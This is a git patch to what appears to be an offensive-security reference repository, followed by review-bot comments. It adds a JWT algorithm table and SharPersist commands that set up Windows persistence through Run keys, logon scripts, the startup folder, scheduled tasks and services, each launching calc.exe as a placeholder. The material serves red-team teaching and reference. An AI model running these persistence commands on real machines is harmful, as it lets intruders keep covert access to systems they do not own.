From 742e3204d3ddc2a521555acff02d8b6f3d9aeb52 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Fri, 13 Sep 2019 17:38:23 +0200 Subject: [PATCH] SharpPersist - Windows Persistence --- JSON Web Token/README.md | 21 +++++++++- .../Windows - Persistence.md | 41 ++++++++++++++++++- 2 files changed, 60 insertions(+), 2 deletions(-) diff --git a/JSON Web Token/README.md b/JSON Web Token/README.md index ccdb745b..a6fb0808 100644 --- a/JSON Web Token/README.md +++ b/JSON Web Token/README.md @@ -46,6 +46,24 @@ Default algorithm is "HS256" (HMAC SHA256 symmetric encryption). } ``` +| `alg` Param Value | Digital Signature or MAC Algorithm | Requirements | +|---|---|---| +| HS256 | HMAC using SHA-256 | Required | +| HS384 | HMAC using SHA-384 | Optional | +| HS512 | HMAC using SHA-512 | Optional | +| RS256 | RSASSA-PKCS1-v1_5 using SHA-256 | Recommended | +| RS384 | RSASSA-PKCS1-v1_5 using SHA-384 | Optional | +| RS512 | RSASSA-PKCS1-v1_5 using SHA-512 | Optional | +| ES256 | ECDSA using P-256 and SHA-256 | Recommended | +| ES384 | ECDSA using P-384 and SHA-384 | Optional | +| ES512 | ECDSA using P-521 and SHA-512 | Optional | +| PS256 | RSASSA-PSS using SHA-256 and MGF1 with SHA-256 | Optional | +| PS384 | RSASSA-PSS using SHA-384 and MGF1 with SHA-384 | Optional | +| PS512 | RSASSA-PSS using SHA-512 and MGF1 with SHA-512 | Optional | +| none | No digital signature or MAC performed | Required | + + + ### Payload ```json 
@@ -271,4 +289,5 @@ eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMj...Fh7HgQ:secret - [Attacking JWT authentication - Sep 28, 2016 - Sjoerd Langkemper](https://www.sjoerdlangkemper.nl/2016/09/28/attacking-jwt-authentication/) - [How to Hack a Weak JWT Implementation with a Timing Attack - Jan 7, 2017 - Tamas Polgar](https://hackernoon.com/can-timing-attack-be-a-practical-security-threat-on-jwt-signature-ba3c8340dea9) - [HACKING JSON WEB TOKENS, FROM ZERO TO HERO WITHOUT EFFORT - Thu Feb 09 2017 - @pdp](https://blog.websecurify.com/2017/02/hacking-json-web-tokens.html) -- [Write up – JRR Token – LeHack 2019 - 07/07/2019 - LAPHAZE](http://rootinthemiddle.org/write-up-jrr-token-lehack-2019/) \ No newline at end of file +- [Write up – JRR Token – LeHack 2019 - 07/07/2019 - LAPHAZE](http://rootinthemiddle.org/write-up-jrr-token-lehack-2019/) +- [JWT Hacking 101 - TrustFoundry - Tyler Rosonke - December 8th, 2017](https://trustfoundry.net/jwt-hacking-101/) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md index d8fa2cd3..d005bd8a 100644 --- a/Methodology and Resources/Windows - Persistence.md +++ b/Methodology and Resources/Windows - Persistence.md @@ -2,6 +2,7 @@ ## Summary +* [Tools](#tools) * [Userland](#userland) * [Registry](#registry) * [Startup](#startup) @@ -13,6 +14,10 @@ * [References](#references) +## Tools + +- [SharPersist - Windows persistence toolkit written in C#. - @h4wkst3r](https://github.com/fireeye/SharPersist) + ## Userland ### Registry 
@@ -24,6 +29,14 @@ Value name: Backdoor Value data: C:\Users\Rasta\AppData\Local\Temp\backdoor.exe ``` +Using SharPersist + +```powershell +SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add +SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add -o env +SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "logonscript" -m add +``` + ### Startup Create a batch script in the user startup folder. @@ -33,6 +46,12 @@ PS C:\> gc C:\Users\Rasta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ start /b C:\Users\Rasta\AppData\Local\Temp\backdoor.exe ``` +Using SharPersist + +```powershell +SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "Some File" -m add +``` + ### Scheduled Task ```powershell @@ -44,6 +63,25 @@ PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S PS C:\> Register-ScheduledTask Backdoor -InputObject $D ``` +Using SharPersist + +```powershell +# Add to a current scheduled task +SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add + +# Add new task +SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add +SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add -o hourly +``` + +## Windows Service + +Using SharPersist + +```powershell +SharPersist -t service -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Service" -m add +``` + ## Elevated ### HKLM 
@@ -79,4 +117,5 @@ PS C:\> Register-ScheduledTask Backdoor -InputObject $D ## References * [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/) -* [Windows Persistence Commands - Pwn Wiki](http://pwnwiki.io/#!persistence/windows/index.md) \ No newline at end of file +* [Windows Persistence Commands - Pwn Wiki](http://pwnwiki.io/#!persistence/windows/index.md) +* [SharPersist Windows Persistence Toolkit in C - Brett Hawkins](http://www.youtube.com/watch?v=K7o9RSVyazo) \ No newline at end of file
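Review bot: In the `alg` table added to JSON Web Token/README.md (hunk `@@ -46,6 +46,24 @@`), the Requirements column has no source and no explanation, so the `none` row marked "Required" can be read as advice that a verifier must accept unsigned tokens. Add a sentence under the table saying where the column comes from and that it describes implementation requirements, not a security rating, and that a verifier should accept only an explicit allow-list of algorithms. The context line above the table calls HS256 "symmetric encryption" while the new HS256 row says "HMAC using SHA-256"; align the two. The three empty `+` lines before `### Payload` can be reduced to one.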
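Review bot: The JSON Web Token reference change (hunk `@@ -271,4 +289,5 @@`) is unrelated to the commit subject "SharpPersist - Windows Persistence". Split it, together with the `alg` table, into its own commit so the history of each page stays searchable. The new last line still carries "\ No newline at end of file", so the next appended reference will rewrite this line again; end the file with a newline.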
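Review bot: In the Registry hunk (`@@ -24,6 +29,14 @@`), the three SharPersist lines use `-k "hkcurun"`, `-k "logonscript"` and `-o env` without saying which key or value each one writes, unlike the manual example above them, which spells out the value name and value data. Add a line per variant naming the registry location it touches so a reader can audit or clean up the entry; the same applies to `-f "Some File"` in the Startup hunk. Every example shows only `-m add`, so document how each entry is removed as well. "Using SharPersist" appears as bare text in four places; make it a consistent sub-heading or bold label.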
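Review bot: `## Windows Service`, at the end of hunk `@@ -44,6 +63,25 @@`, is added as a level-2 heading between the `###` Userland subsections and `## Elevated`, while the Summary hunk adds only `* [Tools](#tools)`. The new section therefore has no table-of-contents entry and its place in the Userland/Elevated split is unclear. Decide which parent it belongs to (Elevated, if the service technique needs administrative rights), make it `###` under that parent, and add the matching Summary bullet. In the same hunk, the comment `# Add to a current scheduled task` would read more clearly as "Modify an existing scheduled task".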
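Review bot: The reference added in hunk `@@ -79,4 +117,5 @@` is titled "SharPersist Windows Persistence Toolkit in C", while the Tools entry added earlier in this patch says "written in C#"; the `#` appears to have been dropped. The link uses `http://www.youtube.com/...` where https is available, and the file still ends without a newline. The commit subject spells the tool "SharpPersist" while every added line spells it "SharPersist"; use one spelling so the commit can be found by tool name.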